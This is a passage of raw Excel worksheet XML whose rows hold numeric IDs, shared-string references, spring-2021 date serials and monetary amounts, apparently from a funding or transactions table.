      <c r="C4319" t="s">
        <v>16538</v>
      </c>
      <c r="D4319" t="s">
        <v>16539</v>
      </c>
      <c r="E4319">
        <v>12</v>
      </c>
      <c r="F4319" t="s">
        <v>13522</v>
      </c>
      <c r="G4319" s="1">
        <v>44322</v>
      </c>
      <c r="H4319" t="s">
        <v>16276</v>
      </c>
      <c r="J4319" t="s">
        <v>13521</v>
      </c>
    </row>
    <row r="4320" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4320">
        <v>24814</v>
      </c>
      <c r="B4320">
        <v>108</v>
      </c>
      <c r="C4320" t="s">
        <v>2350</v>
      </c>
      <c r="D4320" t="s">
        <v>13515</v>
      </c>
      <c r="E4320">
        <v>12</v>
      </c>
      <c r="F4320" t="s">
        <v>9533</v>
      </c>
      <c r="G4320" s="1">
        <v>44322</v>
      </c>
      <c r="H4320">
        <v>0</v>
      </c>
      <c r="J4320" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4321" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4321">
        <v>24815</v>
      </c>
      <c r="B4321">
        <v>108</v>
      </c>
      <c r="C4321" t="s">
        <v>2350</v>
      </c>
      <c r="D4321" t="s">
        <v>13515</v>
      </c>
      <c r="E4321">
        <v>12</v>
      </c>
      <c r="F4321" t="s">
        <v>9681</v>
      </c>
      <c r="G4321" s="1">
        <v>44322</v>
      </c>
      <c r="H4321">
        <v>0</v>
      </c>
      <c r="J4321" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4322" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4322">
        <v>24816</v>
      </c>
      <c r="B4322">
        <v>5507</v>
      </c>
      <c r="C4322" t="s">
        <v>8946</v>
      </c>
      <c r="D4322" t="s">
        <v>13523</v>
      </c>
      <c r="E4322">
        <v>1</v>
      </c>
      <c r="F4322" t="s">
        <v>13524</v>
      </c>
      <c r="G4322" s="1">
        <v>44323</v>
      </c>
      <c r="H4322">
        <v>100000</v>
      </c>
      <c r="I4322" t="s">
        <v>9603</v>
      </c>
    </row>
    <row r="4323" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4323">
        <v>24817</v>
      </c>
      <c r="B4323">
        <v>5507</v>
      </c>
      <c r="C4323" t="s">
        <v>8946</v>
      </c>
      <c r="D4323" t="s">
        <v>13523</v>
      </c>
      <c r="E4323">
        <v>1</v>
      </c>
      <c r="F4323" t="s">
        <v>13525</v>
      </c>
      <c r="G4323" s="1">
        <v>44323</v>
      </c>
      <c r="H4323">
        <v>100000</v>
      </c>
      <c r="I4323" t="s">
        <v>9603</v>
      </c>
    </row>
    <row r="4324" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4324">
        <v>24818</v>
      </c>
      <c r="B4324">
        <v>5507</v>
      </c>
      <c r="C4324" t="s">
        <v>8946</v>
      </c>
      <c r="D4324" t="s">
        <v>13523</v>
      </c>
      <c r="E4324">
        <v>1</v>
      </c>
      <c r="F4324" t="s">
        <v>11643</v>
      </c>
      <c r="G4324" s="1">
        <v>44323</v>
      </c>
      <c r="H4324">
        <v>100000</v>
      </c>
    </row>
    <row r="4325" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4325">
        <v>24819</v>
      </c>
      <c r="B4325">
        <v>5507</v>
      </c>
      <c r="C4325" t="s">
        <v>8946</v>
      </c>
      <c r="D4325" t="s">
        <v>13523</v>
      </c>
      <c r="E4325">
        <v>1</v>
      </c>
      <c r="F4325" t="s">
        <v>13242</v>
      </c>
      <c r="G4325" s="1">
        <v>44323</v>
      </c>
      <c r="H4325">
        <v>100000</v>
      </c>
    </row>
    <row r="4326" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4326">
        <v>24820</v>
      </c>
      <c r="B4326">
        <v>5507</v>
      </c>
      <c r="C4326" t="s">
        <v>8946</v>
      </c>
      <c r="D4326" t="s">
        <v>13523</v>
      </c>
      <c r="E4326">
        <v>1</v>
      </c>
      <c r="F4326" t="s">
        <v>9610</v>
      </c>
      <c r="G4326" s="1">
        <v>44323</v>
      </c>
      <c r="H4326">
        <v>100000</v>
      </c>
    </row>
    <row r="4327" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4327">
        <v>24821</v>
      </c>
      <c r="B4327">
        <v>5509</v>
      </c>
      <c r="C4327" t="s">
        <v>8954</v>
      </c>
      <c r="D4327" t="s">
        <v>13526</v>
      </c>
      <c r="E4327">
        <v>26</v>
      </c>
      <c r="F4327" t="s">
        <v>13527</v>
      </c>
      <c r="G4327" s="1">
        <v>44316</v>
      </c>
      <c r="H4327">
        <v>4400</v>
      </c>
      <c r="I4327" t="s">
        <v>9522</v>
      </c>
    </row>
    <row r="4328" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4328">
        <v>24825</v>
      </c>
      <c r="B4328">
        <v>1265</v>
      </c>
      <c r="C4328" t="s">
        <v>3607</v>
      </c>
      <c r="D4328" t="s">
        <v>12046</v>
      </c>
      <c r="E4328">
        <v>29</v>
      </c>
      <c r="F4328" t="s">
        <v>945</v>
      </c>
      <c r="G4328" s="1">
        <v>44347</v>
      </c>
      <c r="H4328">
        <v>3444004</v>
      </c>
      <c r="I4328" t="s">
        <v>13528</v>
      </c>
      <c r="J4328" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="4329" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4329">
        <v>24827</v>
      </c>
      <c r="B4329">
        <v>1265</v>
      </c>
      <c r="C4329" t="s">
        <v>16540</v>
      </c>
      <c r="D4329" t="s">
        <v>16541</v>
      </c>
      <c r="E4329">
        <v>29</v>
      </c>
      <c r="F4329" t="s">
        <v>6504</v>
      </c>
      <c r="G4329" s="1">
        <v>44347</v>
      </c>
      <c r="H4329">
        <v>177684</v>
      </c>
      <c r="I4329" t="s">
        <v>9485</v>
      </c>
      <c r="J4329" t="s">
        <v>11948</v>
      </c>
    </row>
    <row r="4330" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4330">
        <v>24828</v>
      </c>
      <c r="B4330">
        <v>1265</v>
      </c>
      <c r="C4330" t="s">
        <v>16540</v>
      </c>
      <c r="D4330" t="s">
        <v>16541</v>
      </c>
      <c r="E4330">
        <v>29</v>
      </c>
      <c r="F4330" t="s">
        <v>13529</v>
      </c>
      <c r="G4330" s="1">
        <v>44347</v>
      </c>
      <c r="H4330">
        <v>2887360.18</v>
      </c>
      <c r="J4330" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4331" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4331">
        <v>24829</v>
      </c>
      <c r="B4331">
        <v>1265</v>
      </c>
      <c r="C4331" t="s">
        <v>3607</v>
      </c>
      <c r="D4331" t="s">
        <v>12046</v>
      </c>
      <c r="E4331">
        <v>29</v>
      </c>
      <c r="F4331" t="s">
        <v>4062</v>
      </c>
      <c r="G4331" s="1">
        <v>44347</v>
      </c>
      <c r="H4331">
        <v>1676115</v>
      </c>
      <c r="I4331" t="s">
        <v>13530</v>
      </c>
      <c r="J4331" t="s">
        <v>13531</v>
      </c>
    </row>
    <row r="4332" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4332">
        <v>24830</v>
      </c>
      <c r="B4332">
        <v>5474</v>
      </c>
      <c r="C4332" t="s">
        <v>8819</v>
      </c>
      <c r="D4332" t="s">
        <v>13532</v>
      </c>
      <c r="E4332">
        <v>11</v>
      </c>
      <c r="F4332" t="s">
        <v>13514</v>
      </c>
      <c r="G4332" s="1">
        <v>44306</v>
      </c>
      <c r="H4332">
        <v>100000</v>
      </c>
      <c r="I4332" t="s">
        <v>9571</v>
      </c>
      <c r="J4332" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4333" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4333">
        <v>24831</v>
      </c>
      <c r="B4333">
        <v>5474</v>
      </c>
      <c r="C4333" t="s">
        <v>8819</v>
      </c>
      <c r="D4333" t="s">
        <v>13532</v>
      </c>
      <c r="E4333">
        <v>11</v>
      </c>
      <c r="F4333" t="s">
        <v>9732</v>
      </c>
      <c r="G4333" s="1">
        <v>44306</v>
      </c>
      <c r="H4333">
        <v>100000</v>
      </c>
      <c r="I4333" t="s">
        <v>9571</v>
      </c>
      <c r="J4333" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4334" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4334">
        <v>24832</v>
      </c>
      <c r="B4334">
        <v>5474</v>
      </c>
      <c r="C4334" t="s">
        <v>8819</v>
      </c>
      <c r="D4334" t="s">
        <v>13532</v>
      </c>
      <c r="E4334">
        <v>11</v>
      </c>
      <c r="F4334" t="s">
        <v>9561</v>
      </c>
      <c r="G4334" s="1">
        <v>44306</v>
      </c>
      <c r="H4334">
        <v>100000</v>
      </c>
      <c r="I4334" t="s">
        <v>9571</v>
      </c>
      <c r="J4334" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4335" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4335">
        <v>24833</v>
      </c>
      <c r="B4335">
        <v>5474</v>
      </c>
      <c r="C4335" t="s">
        <v>8819</v>
      </c>
      <c r="D4335" t="s">
        <v>13532</v>
      </c>
      <c r="E4335">
        <v>11</v>
      </c>
      <c r="F4335" t="s">
        <v>8913</v>
      </c>
      <c r="G4335" s="1">
        <v>44306</v>
      </c>
      <c r="H4335">
        <v>10000</v>
      </c>
    </row>
    <row r="4336" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4336">
        <v>24835</v>
      </c>
      <c r="B4336">
        <v>1658</v>
      </c>
      <c r="C4336" t="s">
        <v>4564</v>
      </c>
      <c r="D4336" t="s">
        <v>13533</v>
      </c>
      <c r="E4336">
        <v>23</v>
      </c>
      <c r="F4336" t="s">
        <v>13534</v>
      </c>
      <c r="G4336" s="1">
        <v>44327</v>
      </c>
      <c r="H4336">
        <v>24311</v>
      </c>
      <c r="I4336" t="s">
        <v>9952</v>
      </c>
      <c r="J4336" t="s">
        <v>10668</v>
      </c>
    </row>
    <row r="4337" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4337">
        <v>24836</v>
      </c>
      <c r="B4337">
        <v>1265</v>
      </c>
      <c r="C4337" t="s">
        <v>3607</v>
      </c>
      <c r="D4337" t="s">
        <v>12046</v>
      </c>
      <c r="E4337">
        <v>29</v>
      </c>
      <c r="F4337" t="s">
        <v>1455</v>
      </c>
      <c r="G4337" s="1">
        <v>44347</v>
      </c>
      <c r="H4337">
        <v>1294550</v>
      </c>
      <c r="I4337" t="s">
        <v>9540</v>
      </c>
    </row>
    <row r="4338" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4338">
        <v>24838</v>
      </c>
      <c r="B4338">
        <v>1700</v>
      </c>
      <c r="C4338" t="s">
        <v>4557</v>
      </c>
      <c r="D4338" t="s">
        <v>13535</v>
      </c>
      <c r="E4338">
        <v>33</v>
      </c>
      <c r="F4338" t="s">
        <v>1746</v>
      </c>
      <c r="G4338" s="1">
        <v>44274</v>
      </c>
      <c r="H4338">
        <v>100000</v>
      </c>
      <c r="I4338" t="s">
        <v>9536</v>
      </c>
      <c r="J4338" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4339" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4339">
        <v>24840</v>
      </c>
      <c r="B4339">
        <v>1598</v>
      </c>
      <c r="C4339" t="s">
        <v>16542</v>
      </c>
      <c r="D4339" t="s">
        <v>16543</v>
      </c>
      <c r="E4339">
        <v>26</v>
      </c>
      <c r="F4339" t="s">
        <v>2407</v>
      </c>
      <c r="G4339" s="1">
        <v>44319</v>
      </c>
      <c r="H4339" s="4">
        <v>14943047</v>
      </c>
      <c r="J4339" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4340" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4340">
        <v>24841</v>
      </c>
      <c r="B4340">
        <v>1771</v>
      </c>
      <c r="C4340" t="s">
        <v>6487</v>
      </c>
      <c r="D4340" t="s">
        <v>11891</v>
      </c>
      <c r="E4340">
        <v>33</v>
      </c>
      <c r="F4340" t="s">
        <v>1746</v>
      </c>
      <c r="G4340" s="1">
        <v>44278</v>
      </c>
      <c r="H4340">
        <v>100000</v>
      </c>
      <c r="I4340" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="4341" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4341">
        <v>24842</v>
      </c>
      <c r="B4341">
        <v>5098</v>
      </c>
      <c r="C4341" t="s">
        <v>8806</v>
      </c>
      <c r="D4341" t="s">
        <v>13536</v>
      </c>
      <c r="E4341">
        <v>12</v>
      </c>
      <c r="F4341" t="s">
        <v>9437</v>
      </c>
      <c r="G4341" s="1">
        <v>44301</v>
      </c>
      <c r="H4341">
        <v>30000</v>
      </c>
      <c r="I4341" t="s">
        <v>13537</v>
      </c>
      <c r="J4341" t="s">
        <v>13538</v>
      </c>
    </row>
    <row r="4342" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4342">
        <v>24843</v>
      </c>
      <c r="B4342">
        <v>5098</v>
      </c>
      <c r="C4342" t="s">
        <v>8806</v>
      </c>
      <c r="D4342" t="s">
        <v>13536</v>
      </c>
      <c r="E4342">
        <v>12</v>
      </c>
      <c r="F4342" t="s">
        <v>13539</v>
      </c>
      <c r="G4342" s="1">
        <v>44301</v>
      </c>
      <c r="H4342">
        <v>10000</v>
      </c>
      <c r="I4342" t="s">
        <v>13537</v>
      </c>
      <c r="J4342" t="s">
        <v>13538</v>
      </c>
    </row>
    <row r="4343" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4343">
        <v>24844</v>
      </c>
      <c r="B4343">
        <v>5098</v>
      </c>
      <c r="C4343" t="s">
        <v>8806</v>
      </c>
      <c r="D4343" t="s">
        <v>13536</v>
      </c>
      <c r="E4343">
        <v>12</v>
      </c>
      <c r="F4343" t="s">
        <v>13540</v>
      </c>
      <c r="G4343" s="1">
        <v>44301</v>
      </c>
      <c r="H4343">
        <v>10000</v>
      </c>
      <c r="I4343" t="s">
        <v>13537</v>
      </c>
    </row>
    <row r="4344" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4344">
        <v>24845</v>
      </c>
      <c r="B4344">
        <v>5098</v>
      </c>
      <c r="C4344" t="s">
        <v>8806</v>
      </c>
      <c r="D4344" t="s">
        <v>13536</v>
      </c>
      <c r="E4344">
        <v>12</v>
      </c>
      <c r="F4344" t="s">
        <v>1746</v>
      </c>
      <c r="G4344" s="1">
        <v>44301</v>
      </c>
      <c r="H4344">
        <v>10000</v>
      </c>
      <c r="I4344" t="s">
        <v>13537</v>
      </c>
    </row>
    <row r="4345" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4345">
        <v>24846</v>
      </c>
      <c r="B4345">
        <v>5098</v>
      </c>
      <c r="C4345" t="s">
        <v>8806</v>
      </c>
      <c r="D4345" t="s">
        <v>13541</v>
      </c>
      <c r="E4345">
        <v>12</v>
      </c>
      <c r="F4345" t="s">
        <v>13542</v>
      </c>
      <c r="G4345" s="1">
        <v>44301</v>
      </c>
      <c r="H4345">
        <v>10000</v>
      </c>
      <c r="I4345" t="s">
        <v>13543</v>
      </c>
      <c r="J4345" t="s">
        <v>13538</v>
      </c>
    </row>
    <row r="4346" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4346">
        <v>24847</v>
      </c>
      <c r="B4346">
        <v>5098</v>
      </c>
      <c r="C4346" t="s">
        <v>8806</v>
      </c>
      <c r="D4346" t="s">
        <v>13536</v>
      </c>
      <c r="E4346">
        <v>12</v>
      </c>
      <c r="F4346" t="s">
        <v>12873</v>
      </c>
      <c r="G4346" s="1">
        <v>44301</v>
      </c>
      <c r="H4346">
        <v>10000</v>
      </c>
      <c r="I4346" t="s">
        <v>13537</v>
      </c>
    </row>
    <row r="4347" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4347">
        <v>24848</v>
      </c>
      <c r="B4347">
        <v>1353</v>
      </c>
      <c r="C4347" t="s">
        <v>3081</v>
      </c>
      <c r="D4347" t="s">
        <v>13544</v>
      </c>
      <c r="E4347">
        <v>11</v>
      </c>
      <c r="F4347" t="s">
        <v>13545</v>
      </c>
      <c r="G4347" s="1">
        <v>44309</v>
      </c>
      <c r="H4347">
        <v>120000</v>
      </c>
      <c r="J4347" t="s">
        <v>10044</v>
      </c>
    </row>
    <row r="4348" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4348">
        <v>24849</v>
      </c>
      <c r="B4348">
        <v>1353</v>
      </c>
      <c r="C4348" t="s">
        <v>3081</v>
      </c>
      <c r="D4348" t="s">
        <v>13544</v>
      </c>
      <c r="E4348">
        <v>11</v>
      </c>
      <c r="F4348" t="s">
        <v>609</v>
      </c>
      <c r="G4348" s="1">
        <v>44309</v>
      </c>
      <c r="H4348">
        <v>60000</v>
      </c>
      <c r="J4348" t="s">
        <v>10044</v>
      </c>
    </row>
    <row r="4349" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4349">
        <v>24850</v>
      </c>
      <c r="B4349">
        <v>1353</v>
      </c>
      <c r="C4349" t="s">
        <v>3081</v>
      </c>
      <c r="D4349" t="s">
        <v>13544</v>
      </c>
      <c r="E4349">
        <v>11</v>
      </c>
      <c r="F4349" t="s">
        <v>9681</v>
      </c>
      <c r="G4349" s="1">
        <v>44309</v>
      </c>
      <c r="H4349">
        <v>10000</v>
      </c>
      <c r="J4349" t="s">
        <v>10044</v>
      </c>
    </row>
    <row r="4350" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4350">
        <v>24851</v>
      </c>
      <c r="B4350">
        <v>1634</v>
      </c>
      <c r="C4350" t="s">
        <v>4541</v>
      </c>
      <c r="D4350" t="s">
        <v>13546</v>
      </c>
      <c r="E4350">
        <v>26</v>
      </c>
      <c r="F4350" t="s">
        <v>364</v>
      </c>
      <c r="G4350" s="1">
        <v>44308</v>
      </c>
      <c r="H4350">
        <v>1000000</v>
      </c>
      <c r="J4350" t="s">
        <v>13547</v>
      </c>
    </row>
    <row r="4351" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4351">
        <v>24852</v>
      </c>
      <c r="B4351">
        <v>5465</v>
      </c>
      <c r="C4351" t="s">
        <v>16544</v>
      </c>
      <c r="D4351" t="s">
        <v>16545</v>
      </c>
      <c r="E4351">
        <v>16</v>
      </c>
      <c r="F4351" t="s">
        <v>364</v>
      </c>
      <c r="G4351" s="1">
        <v>44306</v>
      </c>
      <c r="H4351" s="4">
        <v>3525000</v>
      </c>
      <c r="I4351" t="s">
        <v>10194</v>
      </c>
      <c r="J4351" t="s">
        <v>13548</v>
      </c>
    </row>
    <row r="4352" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4352">
        <v>24853</v>
      </c>
      <c r="B4352">
        <v>2390</v>
      </c>
      <c r="C4352" t="s">
        <v>5376</v>
      </c>
      <c r="D4352" t="s">
        <v>13549</v>
      </c>
      <c r="E4352">
        <v>12</v>
      </c>
      <c r="F4352" t="s">
        <v>9437</v>
      </c>
      <c r="G4352" s="1">
        <v>44340</v>
      </c>
      <c r="H4352">
        <v>1000000</v>
      </c>
      <c r="J4352" t="s">
        <v>13463</v>
      </c>
    </row>
    <row r="4353" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4353">
        <v>24854</v>
      </c>
      <c r="B4353">
        <v>2390</v>
      </c>
      <c r="C4353" t="s">
        <v>5376</v>
      </c>
      <c r="D4353" t="s">
        <v>13549</v>
      </c>
      <c r="E4353">
        <v>12</v>
      </c>
      <c r="F4353" t="s">
        <v>13550</v>
      </c>
      <c r="G4353" s="1">
        <v>44340</v>
      </c>
      <c r="H4353">
        <v>1000000</v>
      </c>
      <c r="J4353" t="s">
        <v>13463</v>
      </c>
    </row>
    <row r="4354" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4354">
        <v>24855</v>
      </c>
      <c r="B4354">
        <v>2390</v>
      </c>
      <c r="C4354" t="s">
        <v>5376</v>
      </c>
      <c r="D4354" t="s">
        <v>13549</v>
      </c>
      <c r="E4354">
        <v>12</v>
      </c>
      <c r="F4354" t="s">
        <v>13551</v>
      </c>
      <c r="G4354" s="1">
        <v>44340</v>
      </c>
      <c r="H4354">
        <v>1000000</v>
      </c>
      <c r="J4354" t="s">
        <v>10749</v>
      </c>
    </row>
    <row r="4355" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4355">
        <v>24856</v>
      </c>
      <c r="B4355">
        <v>2390</v>
      </c>
      <c r="C4355" t="s">
        <v>5376</v>
      </c>
      <c r="D4355" t="s">
        <v>13549</v>
      </c>
      <c r="E4355">
        <v>12</v>
      </c>
      <c r="F4355" t="s">
        <v>2236</v>
      </c>
      <c r="G4355" s="1">
        <v>44340</v>
      </c>
      <c r="H4355">
        <v>1000000</v>
      </c>
      <c r="J4355" t="s">
        <v>13463</v>
      </c>
    </row>
    <row r="4356" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4356">
        <v>24857</v>
      </c>
      <c r="B4356">
        <v>1699</v>
      </c>
      <c r="C4356" t="s">
        <v>4449</v>
      </c>
      <c r="D4356" t="s">
        <v>13552</v>
      </c>
      <c r="E4356">
        <v>26</v>
      </c>
      <c r="F4356" t="s">
        <v>13553</v>
      </c>
      <c r="G4356" s="1">
        <v>44307</v>
      </c>
      <c r="H4356">
        <v>357000</v>
      </c>
      <c r="I4356" t="s">
        <v>13554</v>
      </c>
      <c r="J4356" t="s">
        <v>13555</v>
      </c>
    </row>
    <row r="4357" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4357">
        <v>24858</v>
      </c>
      <c r="B4357">
        <v>1699</v>
      </c>
      <c r="C4357" t="s">
        <v>4449</v>
      </c>
      <c r="D4357" t="s">
        <v>13552</v>
      </c>
      <c r="E4357">
        <v>26</v>
      </c>
      <c r="F4357" t="s">
        <v>13556</v>
      </c>
      <c r="G4357" s="1">
        <v>44307</v>
      </c>
      <c r="H4357">
        <v>15000</v>
      </c>
      <c r="I4357" t="s">
        <v>13557</v>
      </c>
      <c r="J4357" t="s">
        <v>9832</v>
      </c>
    </row>
    <row r="4358" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4358">
        <v>24859</v>
      </c>
      <c r="B4358">
        <v>1699</v>
      </c>
      <c r="C4358" t="s">
        <v>4449</v>
      </c>
      <c r="D4358" t="s">
        <v>13552</v>
      </c>
      <c r="E4358">
        <v>26</v>
      </c>
      <c r="F4358" t="s">
        <v>9681</v>
      </c>
      <c r="G4358" s="1">
        <v>44307</v>
      </c>
      <c r="H4358">
        <v>12500</v>
      </c>
      <c r="I4358" t="s">
        <v>13554</v>
      </c>
      <c r="J4358" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="4359" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4359">
        <v>24860</v>
      </c>
      <c r="B4359">
        <v>1699</v>
      </c>
      <c r="C4359" t="s">
        <v>4449</v>
      </c>
      <c r="D4359" t="s">
        <v>13552</v>
      </c>
      <c r="E4359">
        <v>26</v>
      </c>
      <c r="F4359" t="s">
        <v>9470</v>
      </c>
      <c r="G4359" s="1">
        <v>44307</v>
      </c>
      <c r="H4359">
        <v>21000</v>
      </c>
      <c r="I4359" t="s">
        <v>13554</v>
      </c>
      <c r="J4359" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="4360" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4360">
        <v>24861</v>
      </c>
      <c r="B4360">
        <v>1699</v>
      </c>
      <c r="C4360" t="s">
        <v>4449</v>
      </c>
      <c r="D4360" t="s">
        <v>13552</v>
      </c>
      <c r="E4360">
        <v>26</v>
      </c>
      <c r="F4360" t="s">
        <v>12841</v>
      </c>
      <c r="G4360" s="1">
        <v>44307</v>
      </c>
      <c r="H4360">
        <v>27500</v>
      </c>
      <c r="I4360" t="s">
        <v>13554</v>
      </c>
      <c r="J4360" t="s">
        <v>9832</v>
      </c>
    </row>
    <row r="4361" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4361">
        <v>24862</v>
      </c>
      <c r="B4361">
        <v>1699</v>
      </c>
      <c r="C4361" t="s">
        <v>4449</v>
      </c>
      <c r="D4361" t="s">
        <v>13552</v>
      </c>
      <c r="E4361">
        <v>26</v>
      </c>
      <c r="F4361" t="s">
        <v>2236</v>
      </c>
      <c r="G4361" s="1">
        <v>44307</v>
      </c>
      <c r="H4361">
        <v>18500</v>
      </c>
      <c r="I4361" t="s">
        <v>13554</v>
      </c>
      <c r="J4361" t="s">
        <v>9832</v>
      </c>
    </row>
    <row r="4362" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4362">
        <v>24863</v>
      </c>
      <c r="B4362">
        <v>1699</v>
      </c>
      <c r="C4362" t="s">
        <v>4449</v>
      </c>
      <c r="D4362" t="s">
        <v>13552</v>
      </c>
      <c r="E4362">
        <v>26</v>
      </c>
      <c r="F4362" t="s">
        <v>4686</v>
      </c>
      <c r="G4362" s="1">
        <v>44307</v>
      </c>
      <c r="H4362">
        <v>650</v>
      </c>
      <c r="I4362" t="s">
        <v>10003</v>
      </c>
      <c r="J4362" t="s">
        <v>9832</v>
      </c>
    </row>
    <row r="4363" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4363">
        <v>24864</v>
      </c>
      <c r="B4363">
        <v>1699</v>
      </c>
      <c r="C4363" t="s">
        <v>4449</v>
      </c>
      <c r="D4363" t="s">
        <v>13552</v>
      </c>
      <c r="E4363">
        <v>26</v>
      </c>
      <c r="F4363" t="s">
        <v>1746</v>
      </c>
      <c r="G4363" s="1">
        <v>44307</v>
      </c>
      <c r="H4363">
        <v>1200</v>
      </c>
      <c r="I4363" t="s">
        <v>9693</v>
      </c>
      <c r="J4363" t="s">
        <v>9832</v>
      </c>
    </row>
    <row r="4364" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4364">
        <v>24865</v>
      </c>
      <c r="B4364">
        <v>1699</v>
      </c>
      <c r="C4364" t="s">
        <v>4449</v>
      </c>
      <c r="D4364" t="s">
        <v>13552</v>
      </c>
      <c r="E4364">
        <v>26</v>
      </c>
      <c r="F4364" t="s">
        <v>3814</v>
      </c>
      <c r="G4364" s="1">
        <v>44307</v>
      </c>
      <c r="H4364">
        <v>240</v>
      </c>
      <c r="I4364" t="s">
        <v>13554</v>
      </c>
      <c r="J4364" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="4365" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4365">
        <v>24866</v>
      </c>
      <c r="B4365">
        <v>1658</v>
      </c>
      <c r="C4365" t="s">
        <v>4564</v>
      </c>
      <c r="D4365" t="s">
        <v>13533</v>
      </c>
      <c r="E4365">
        <v>23</v>
      </c>
      <c r="F4365" t="s">
        <v>13558</v>
      </c>
      <c r="G4365" s="1">
        <v>44327</v>
      </c>
      <c r="H4365">
        <v>36477</v>
      </c>
      <c r="I4365" t="s">
        <v>9952</v>
      </c>
      <c r="J4365" t="s">
        <v>10668</v>
      </c>
    </row>
    <row r="4366" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4366">
        <v>24885</v>
      </c>
      <c r="B4366">
        <v>5105</v>
      </c>
      <c r="C4366" t="s">
        <v>8002</v>
      </c>
      <c r="D4366" t="s">
        <v>12431</v>
      </c>
      <c r="E4366">
        <v>16</v>
      </c>
      <c r="F4366" t="s">
        <v>13559</v>
      </c>
      <c r="G4366" s="1">
        <v>44300</v>
      </c>
      <c r="H4366">
        <v>1000</v>
      </c>
      <c r="I4366" t="s">
        <v>13560</v>
      </c>
    </row>
    <row r="4367" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4367">
        <v>24886</v>
      </c>
      <c r="B4367">
        <v>5479</v>
      </c>
      <c r="C4367" t="s">
        <v>8829</v>
      </c>
      <c r="D4367" t="s">
        <v>13561</v>
      </c>
      <c r="E4367">
        <v>16</v>
      </c>
      <c r="F4367" t="s">
        <v>3326</v>
      </c>
      <c r="G4367" s="1">
        <v>44287</v>
      </c>
      <c r="H4367">
        <v>618000</v>
      </c>
      <c r="J4367" t="s">
        <v>10133</v>
      </c>
    </row>
    <row r="4368" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4368">
        <v>24887</v>
      </c>
      <c r="B4368">
        <v>5479</v>
      </c>
      <c r="C4368" t="s">
        <v>8829</v>
      </c>
      <c r="D4368" t="s">
        <v>13561</v>
      </c>
      <c r="E4368">
        <v>16</v>
      </c>
      <c r="F4368" t="s">
        <v>13562</v>
      </c>
      <c r="G4368" s="1">
        <v>44287</v>
      </c>
      <c r="H4368">
        <v>252000</v>
      </c>
      <c r="J4368" t="s">
        <v>13563</v>
      </c>
    </row>
    <row r="4369" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4369">
        <v>24888</v>
      </c>
      <c r="B4369">
        <v>88</v>
      </c>
      <c r="C4369" t="s">
        <v>73</v>
      </c>
      <c r="D4369" t="s">
        <v>9516</v>
      </c>
      <c r="E4369">
        <v>14</v>
      </c>
      <c r="F4369" t="s">
        <v>385</v>
      </c>
      <c r="G4369" s="1">
        <v>44341</v>
      </c>
      <c r="H4369">
        <v>212000</v>
      </c>
      <c r="I4369" t="s">
        <v>9746</v>
      </c>
      <c r="J4369" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="4370" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4370">
        <v>24889</v>
      </c>
      <c r="B4370">
        <v>88</v>
      </c>
      <c r="C4370" t="s">
        <v>73</v>
      </c>
      <c r="D4370" t="s">
        <v>9516</v>
      </c>
      <c r="E4370">
        <v>14</v>
      </c>
      <c r="F4370" t="s">
        <v>9435</v>
      </c>
      <c r="G4370" s="1">
        <v>44341</v>
      </c>
      <c r="H4370">
